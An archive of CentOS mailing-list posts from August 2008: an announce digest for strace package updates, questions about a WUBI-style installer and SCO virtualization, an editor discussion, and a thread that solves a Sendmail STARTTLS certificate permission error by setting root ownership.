CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] CentOS-announce Digest, Vol 42, Issue 3

[centos-announce-request]

Send CentOS-announce mailing list submissions to
[EMAIL PROTECTED]

To subscribe or unsubscribe via the World Wide Web, visit
http://lists.centos.org/mailman/listinfo/centos-announce
or, via email, send a message with subject or body 'help' to
[EMAIL PROTECTED]

You can reach the person managing the list at
[EMAIL PROTECTED]

When replying, please edit your Subject line so it is more specific
than "Re: Contents of CentOS-announce digest..."


Today's Topics:

   1. CEBA-2008:0824  CentOS 5 i386 strace Update (Karanbir Singh)
   2. CEBA-2008:0824  CentOS 5 x86_64 strace Update (Karanbir Singh)


--

Message: 1
Date: Mon, 11 Aug 2008 01:35:53 +0100
From: Karanbir Singh <[EMAIL PROTECTED]>
Subject: [CentOS-announce] CEBA-2008:0824  CentOS 5 i386 strace Update
To: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii


CentOS Errata and Bugfix Advisory 2008:0824 

Upstream details at : https://rhn.redhat.com/errata/RHBA-2008-0824.html

The following updated files have been uploaded and are currently 
syncing to the mirrors: ( md5sum Filename ) 

i386:
dba0f8d0a2aca6aca15bd81d63a0b295  strace-4.5.16-1.el5_2.2.i386.rpm

Source:
4f46275678d5a11a8d8ceacd3d9c241a  strace-4.5.16-1.el5_2.2.src.rpm


-- 
Karanbir Singh
CentOS Project { http://www.centos.org/ }
irc: z00dax, [EMAIL PROTECTED]



--

Message: 2
Date: Mon, 11 Aug 2008 01:35:53 +0100
From: Karanbir Singh <[EMAIL PROTECTED]>
Subject: [CentOS-announce] CEBA-2008:0824  CentOS 5 x86_64 strace
Update
To: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii


CentOS Errata and Bugfix Advisory 2008:0824 

Upstream details at : https://rhn.redhat.com/errata/RHBA-2008-0824.html

The following updated files have been uploaded and are currently 
syncing to the mirrors: ( md5sum Filename ) 

x86_64:
288c7979157a76555734c4dd532803cf  strace-4.5.16-1.el5_2.2.x86_64.rpm

Source:
4f46275678d5a11a8d8ceacd3d9c241a  strace-4.5.16-1.el5_2.2.src.rpm


-- 
Karanbir Singh
CentOS Project { http://www.centos.org/ }
irc: z00dax, [EMAIL PROTECTED]



--

___
CentOS-announce mailing list
[EMAIL PROTECTED]
http://lists.centos.org/mailman/listinfo/centos-announce


End of CentOS-announce Digest, Vol 42, Issue 3
**
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] WUBI like process for CentOS ?

[Karanbir Singh]

Hi,

Over the last few days a couple of people have asked about WUBI liks 
process for CentOS. I've had to look up what WUBI is ( to save you time 
: http://en.wikipedia.org/wiki/Wubi_(Ubuntu) ) .


Now the question: is there anyway to get something similar for CentOS ? 
or is there a process that someone might follow to achieve the same or 
similar result ?


- KB
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] SCO 7.1 on full virtualization mode

[lingu]

Hi,

  I am trying to install  SCO 7.1 on Centos 5.2 in full virtualization
mode.But the installation requires booting from a floppy drive provide in
the SCO CD.

I tried different ways to attach floppy drive to the guest.I even tried
providing floppy image as a drive to the guest but guest is not booting from
floppy.

 It will be more helpful if any one help me to get this installed .

  Regards,
   lingu
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem - SOLVED

[Jussi Hirvi]

Now I stumble on another problem (not fatal). I think it's only relevant to
dual-MTA setups (separate Sendmail daemons for receiving and transmitting
mail).

I don't find a way to enable STARTTLS (for the receiving sm-daemon) while at
the same time running the receiving daemon with the unprivileged user smmsp.
That is, I cannot use

define(`confRUN_AS_USER', `smmsp:smmsp')dnl

in my thishost-rx.mc.

If someone knows a solution to this, please let me know. Otherwise I will
just sacrifice the extra security provided by smmsp, and run the receiving
Sendmail with the default user policy (started as root, confDEF_USER_ID is
mail:mail). 

- Jussi

--
Jussi Hirvi * Green Spot
Topeliuksenkatu 15 C * 00250 Helsinki * Finland
Tel. & fax +358 9 493 981 * Mobile +358 40 771 2098 (only sms)
[EMAIL PROTECTED] * http://www.greenspot.fi

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Kai Schaetzl]

Ralph Angenendt wrote on Tue, 12 Aug 2008 11:21:33 +0200:

> IIRC sendmail checks from /etc/mail downwards, so /etc/mail is open too
> wide still.

Don't think so, these are the default permissions in CentOS 4, can't check 
on 5 as I moved to postfix on 5. The certs directory needs to be owned by 
root.root and the files as well.

Kai

-- 
Kai Schätzl, Berlin, Germany
Get your web at Conactive Internet Services: http://www.conactive.com



___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Kenneth Porter]

--On Monday, August 11, 2008 7:20 PM -0500 Lanny Marcus 
<[EMAIL PROTECTED]> wrote:



Then you shouldn't go wrong, because I have yet to be on a linux box or a
bsd box that didn't have some form or emulation of vi installed.


vi is everywhere! But, apparently, I need to learn how to use Emacs or
another IDE too, so there's another learning curve.


I agree, learn enough vi that you can deal with a minimal box for recovery 
situations.


I learned EMACS back when it was written in TECO on a Tops-10 system. I 
didn't find it particularly hard to master. There's a built-in tutorial 
system to teach you basic navigation commands (eg. forward/backward 
character/word/line/page) and the default keystrokes make some sense (eg. 
ctrl-F is forward char, ESC-F is forward word, substitute B for backward, 
ctrl-P for previous line, ctrl-N for next line, etc.). Take a half hour to 
go through the tutorial and you should be pretty comfortable with the 
basics.


vi derivatives are likely equally easy to master, but I've never been able 
to figure out the pattern for the keystrokes, so whenever I have to use it, 
I have to go look up the commands.


These days I use Lugaru Epsilon, a commercial EMACS clone available for 
several platforms. But I want to get used to the traditional EMACS shipped 
with most distros.

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem - SOLVED

[Jussi Hirvi]

Ian Forde ([EMAIL PROTECTED]) kirjoitteli (12.8.2008 12:44):
> and change the ownership on the certs dir to root:root while you're
> there... you're okay with 755 perms on /etc/mail, as long as it's
> root:root.  Basically, stick with the stock permissions and you should
> be fine...

Damn it, Ian - changing ownership to root solved it. :-) I thought I had
tried it already. 

Thanks a million!

- Jussi

--
Jussi Hirvi * Green Spot
Topeliuksenkatu 15 C * 00250 Helsinki * Finland
Tel. & fax +358 9 493 981 * Mobile +358 40 771 2098 (only sms)
[EMAIL PROTECTED] * http://www.greenspot.fi

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Jussi Hirvi]

Here's more info about my Sendmail. It's the current version from the CentOS
5 repositories. 

[EMAIL PROTECTED] mail]# sendmail -d0.1
Version 8.13.8
Compiled with: DNSMAP HESIOD HES_GETMAILHOST LDAPMAP LOG MAP_REGEX
MATCHGECOS MILTER MIME7TO8 MIME8TO7 NAMED_BIND NETINET
NETINET6
NETUNIX NEWDB NIS PIPELINING SASLv2 SCANF SOCKETMAP STARTTLS
TCPWRAPPERS USERDB USE_LDAP_INIT

- Jussi

--
Jussi Hirvi * Green Spot
Topeliuksenkatu 15 C * 00250 Helsinki * Finland
Tel. & fax +358 9 493 981 * Mobile +358 40 771 2098 (only sms)
[EMAIL PROTECTED] * http://www.greenspot.fi

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Ian Forde]

On Tue, 2008-08-12 at 02:42 -0700, Ian Forde wrote:
> On Tue, 2008-08-12 at 12:38 +0300, Jussi Hirvi wrote:
> > Ralph Angenendt ([EMAIL PROTECTED]) kirjoitteli (12.8.2008 12:21):
> > >> Thanks for quick reply. That didn't help yet. The error message in 
> > >> maillog
> > >> is still the same: "sendmail.pem unsafe: Permission denied". The 
> > >> directory
> > >> perms are now: 
> > >> [EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
> > >> drwxr-xr-x 24 root root  4096 Mar 29  2007 /
> > >> drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
> > >> drwxr-xr-x  5 root root  4096 Aug 12 12:14 /etc/mail
> > >> dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> > > 
> > > IIRC sendmail checks from /etc/mail downwards, so /etc/mail is open too
> > > wide still.
> > 
> > On another machine (Fecore Core 3, Sendmail 8.13) the /etc/mail perms are
> > 755 too, and it works - thoug there is no SMTP-AUTH on that machine.
> > 
> > I tried it, but the error message in maillog persists after Sendmail
> > restart. The perms are now:
> > 
> > [EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
> > drwxr-xr-x 24 root root  4096 Mar 29  2007 /
> > drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
> > drwx--  5 root root  4096 Aug 12 12:37 /etc/mail
> > dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> > [EMAIL PROTECTED] mail]# ls -l /etc/mail/certs/
> > total 1924
> > -rw--- 1 mail mail1371 Aug 11 12:15 cacert.pem
> > -rw--- 1 mail mail 963 Aug 11 12:15 cakey.pem
> > -rw-r--r-- 1 root root 1952422 Aug 11 14:26 revoke.crl
> > -rw--- 1 mail mail2258 Aug 11 12:16 sendmail.pem
> > 
> > I cannot help thinking that this is *not* actually about the permissions -
> > it must be about something else.
> 
> In addition to doing 'chmod u-w sendmail.pem', change the ownership to
> root:root on all of those files... sendmail drops privs down to smmsp by
> default...

and change the ownership on the certs dir to root:root while you're
there... you're okay with 755 perms on /etc/mail, as long as it's
root:root.  Basically, stick with the stock permissions and you should
be fine...

-I

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Ian Forde]

On Tue, 2008-08-12 at 12:38 +0300, Jussi Hirvi wrote:
> Ralph Angenendt ([EMAIL PROTECTED]) kirjoitteli (12.8.2008 12:21):
> >> Thanks for quick reply. That didn't help yet. The error message in maillog
> >> is still the same: "sendmail.pem unsafe: Permission denied". The directory
> >> perms are now: 
> >> [EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
> >> drwxr-xr-x 24 root root  4096 Mar 29  2007 /
> >> drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
> >> drwxr-xr-x  5 root root  4096 Aug 12 12:14 /etc/mail
> >> dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> > 
> > IIRC sendmail checks from /etc/mail downwards, so /etc/mail is open too
> > wide still.
> 
> On another machine (Fecore Core 3, Sendmail 8.13) the /etc/mail perms are
> 755 too, and it works - thoug there is no SMTP-AUTH on that machine.
> 
> I tried it, but the error message in maillog persists after Sendmail
> restart. The perms are now:
> 
> [EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
> drwxr-xr-x 24 root root  4096 Mar 29  2007 /
> drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
> drwx--  5 root root  4096 Aug 12 12:37 /etc/mail
> dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> [EMAIL PROTECTED] mail]# ls -l /etc/mail/certs/
> total 1924
> -rw--- 1 mail mail1371 Aug 11 12:15 cacert.pem
> -rw--- 1 mail mail 963 Aug 11 12:15 cakey.pem
> -rw-r--r-- 1 root root 1952422 Aug 11 14:26 revoke.crl
> -rw--- 1 mail mail2258 Aug 11 12:16 sendmail.pem
> 
> I cannot help thinking that this is *not* actually about the permissions -
> it must be about something else.

In addition to doing 'chmod u-w sendmail.pem', change the ownership to
root:root on all of those files... sendmail drops privs down to smmsp by
default...

-I

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Ian Forde]

On Tue, 2008-08-12 at 11:21 +0200, Ralph Angenendt wrote:
> Jussi Hirvi wrote:
> > Ralph Angenendt ([EMAIL PROTECTED]) kirjoitteli (12.8.2008 11:24):
> > >> dr-xr-xr-x  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> > > ^^^
> > > 
> > > Even allowing group to read there and enter there might be too much.
> > 
> > Thanks for quick reply. That didn't help yet. The error message in maillog
> > is still the same: "sendmail.pem unsafe: Permission denied". The directory
> > perms are now: 
> > [EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
> > drwxr-xr-x 24 root root  4096 Mar 29  2007 /
> > drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
> > drwxr-xr-x  5 root root  4096 Aug 12 12:14 /etc/mail
> > dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> 
> IIRC sendmail checks from /etc/mail downwards, so /etc/mail is open too

do 'chmod u-w /etc/mail/certs/sendmail.pem' and see if it works... my
certs are in /etc/pki/tls/certs with perms set to 755 on the dirs on the
way down and everything works fine...

-I

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Jussi Hirvi]

Ralph Angenendt ([EMAIL PROTECTED]) kirjoitteli (12.8.2008 12:21):
>> Thanks for quick reply. That didn't help yet. The error message in maillog
>> is still the same: "sendmail.pem unsafe: Permission denied". The directory
>> perms are now: 
>> [EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
>> drwxr-xr-x 24 root root  4096 Mar 29  2007 /
>> drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
>> drwxr-xr-x  5 root root  4096 Aug 12 12:14 /etc/mail
>> dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> 
> IIRC sendmail checks from /etc/mail downwards, so /etc/mail is open too
> wide still.

On another machine (Fecore Core 3, Sendmail 8.13) the /etc/mail perms are
755 too, and it works - thoug there is no SMTP-AUTH on that machine.

I tried it, but the error message in maillog persists after Sendmail
restart. The perms are now:

[EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
drwxr-xr-x 24 root root  4096 Mar 29  2007 /
drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
drwx--  5 root root  4096 Aug 12 12:37 /etc/mail
dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
[EMAIL PROTECTED] mail]# ls -l /etc/mail/certs/
total 1924
-rw--- 1 mail mail1371 Aug 11 12:15 cacert.pem
-rw--- 1 mail mail 963 Aug 11 12:15 cakey.pem
-rw-r--r-- 1 root root 1952422 Aug 11 14:26 revoke.crl
-rw--- 1 mail mail2258 Aug 11 12:16 sendmail.pem

I cannot help thinking that this is *not* actually about the permissions -
it must be about something else.

- Jussi

--
Jussi Hirvi * Green Spot
Topeliuksenkatu 15 C * 00250 Helsinki * Finland
Tel. & fax +358 9 493 981 * Mobile +358 40 771 2098 (only sms)
[EMAIL PROTECTED] * http://www.greenspot.fi

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Ralph Angenendt]

Jussi Hirvi wrote:
> Ralph Angenendt ([EMAIL PROTECTED]) kirjoitteli (12.8.2008 11:24):
> >> dr-xr-xr-x  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> > ^^^
> > 
> > Even allowing group to read there and enter there might be too much.
> 
> Thanks for quick reply. That didn't help yet. The error message in maillog
> is still the same: "sendmail.pem unsafe: Permission denied". The directory
> perms are now: 
> [EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
> drwxr-xr-x 24 root root  4096 Mar 29  2007 /
> drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
> drwxr-xr-x  5 root root  4096 Aug 12 12:14 /etc/mail
> dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs

IIRC sendmail checks from /etc/mail downwards, so /etc/mail is open too
wide still.

Ralph


pgp74aJ4q5nx6.pgp
Description: PGP signature
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Jussi Hirvi]

Ralph Angenendt ([EMAIL PROTECTED]) kirjoitteli (12.8.2008 11:24):
> Jussi Hirvi wrote:
>> Aug 11 15:25:24 mail sm-mta-rx[12785]: STARTTLS=server: file
>> /etc/mail/certs/sendmail.pem unsafe: Permission denied
> 
>> dr-xr-xr-x  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
> ^^^
> 
> Even allowing group to read there and enter there might be too much.

Thanks for quick reply. That didn't help yet. The error message in maillog
is still the same: "sendmail.pem unsafe: Permission denied". The directory
perms are now: 
[EMAIL PROTECTED] mail]# ls -ld / /etc /etc/mail /etc/mail/certs
drwxr-xr-x 24 root root  4096 Mar 29  2007 /
drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
drwxr-xr-x  5 root root  4096 Aug 12 12:14 /etc/mail
dr-x--  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs

- Jussi

--
Jussi Hirvi * Green Spot
Topeliuksenkatu 15 C * 00250 Helsinki * Finland
Tel. & fax +358 9 493 981 * Mobile +358 40 771 2098 (only sms)
[EMAIL PROTECTED] * http://www.greenspot.fi

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Ralph Angenendt]

Lanny Marcus wrote:
> On Mon, Aug 11, 2008 at 1:30 PM, Scott Silva <[EMAIL PROTECTED]>
> wrote:
> > on 8-11-2008 9:06 AM Lanny Marcus spake the following:
> 
> >> I will look at Eclipse, but one of my goals is to be able to fix
> >> problems on a remote box and that will probably require vi.
> >
> > Then you shouldn't go wrong, because I have yet to be on a linux box
> > or a bsd box that didn't have some form or emulation of vi
> > installed.
> 
> vi is everywhere! But, apparently, I need to learn how to use Emacs or
> another IDE too, so there's another learning curve.

Just remember that you are using *vim* and not *vi* - which is a huge(!)
difference. The core features are the same, but vim is so much more
versatile than vi. And can be turned into an IDE (of some sorts) for
programming.

 has *lots* of informations, tipps, tricks, code
snippets and other stuff.

Ralph


pgp9q4ntf9nzI.pgp
Description: PGP signature
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Sendmail with TLS, permission problem

[Ralph Angenendt]

Jussi Hirvi wrote:
> Aug 11 15:25:24 mail sm-mta-rx[12785]: STARTTLS=server: file
> /etc/mail/certs/sendmail.pem unsafe: Permission denied

> dr-xr-xr-x  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs
 ^^^

Even allowing group to read there and enter there might be too much.

Ralph


pgp6Dsueg7HV9.pgp
Description: PGP signature
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] Sendmail with TLS, permission problem

[Jussi Hirvi]

Hello, list,

I have a problem with Sendmail configuration.

I'm building (on CentOS 5) a "dual-MTA" setup with amavisd-new (as specified
in amavisd-new documentation, file README.sendmail-dual).

So far so good. But when I tried to add server SMTP-AUTH and TLS, I get a
strange, permission-related error, and STARTTLS will not start.

In my .mc conf, the Sendmail user is now the usual - mail:mail
define(`confDEF_USER_ID', ``8:12'')dnl
...though when I have cleared this problem, I'm going to add a definition
for a non-privileged Sendmail user like this (for the receiving Sendmail
daemon): 
define(`confRUN_AS_USER', `smmsp:smmsp')dnl

Ok, when I try to start Sendmail, I get this in the maillog:

Aug 11 15:25:24 mail sm-mta-tx[12782]: starting daemon (8.13.8):
[EMAIL PROTECTED]:01:00
Aug 11 15:25:24 mail sm-mta-rx[12785]: starting daemon (8.13.8):
[EMAIL PROTECTED]:00:01
Aug 11 15:25:24 mail sm-mta-rx[12785]: STARTTLS=server: file
/etc/mail/certs/sendmail.pem unsafe: Permission denied

This is strange, because the permissions should be ok - right?

[EMAIL PROTECTED] ~]# ls -ld / /etc /etc/mail /etc/mail/certs
drwxr-xr-x 24 root root  4096 Mar 29  2007 /
drwxr-xr-x 96 root root 12288 Aug 12 04:02 /etc
drwxr-xr-x  5 root root  4096 Aug 11 15:44 /etc/mail
dr-xr-xr-x  2 mail mail  4096 Aug 11 14:42 /etc/mail/certs

[EMAIL PROTECTED] ~]# ls -l /etc/mail/certs
-rw--- 1 mail mail1371 Aug 11 12:15 cacert.pem
-rw--- 1 mail mail 963 Aug 11 12:15 cakey.pem
-rw-r--r-- 1 root root 1952422 Aug 11 14:26 revoke.crl
-rw--- 1 mail mail2258 Aug 11 12:16 sendmail.pem

Any ideas, what I should check next?

This might be a Sendmail bug - it resembles this Debian bug, which also
gives a "unsafe - no permission" error as a symptom.

http://www.mail-archive.com/[EMAIL PROTECTED]/msg01560.htm
l

. Jussi Hirvi

--
Jussi Hirvi * Green Spot
Topeliuksenkatu 15 C * 00250 Helsinki * Finland
Tel. & fax +358 9 493 981 * Mobile +358 40 771 2098 (only sms)
[EMAIL PROTECTED] * http://www.greenspot.fi

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos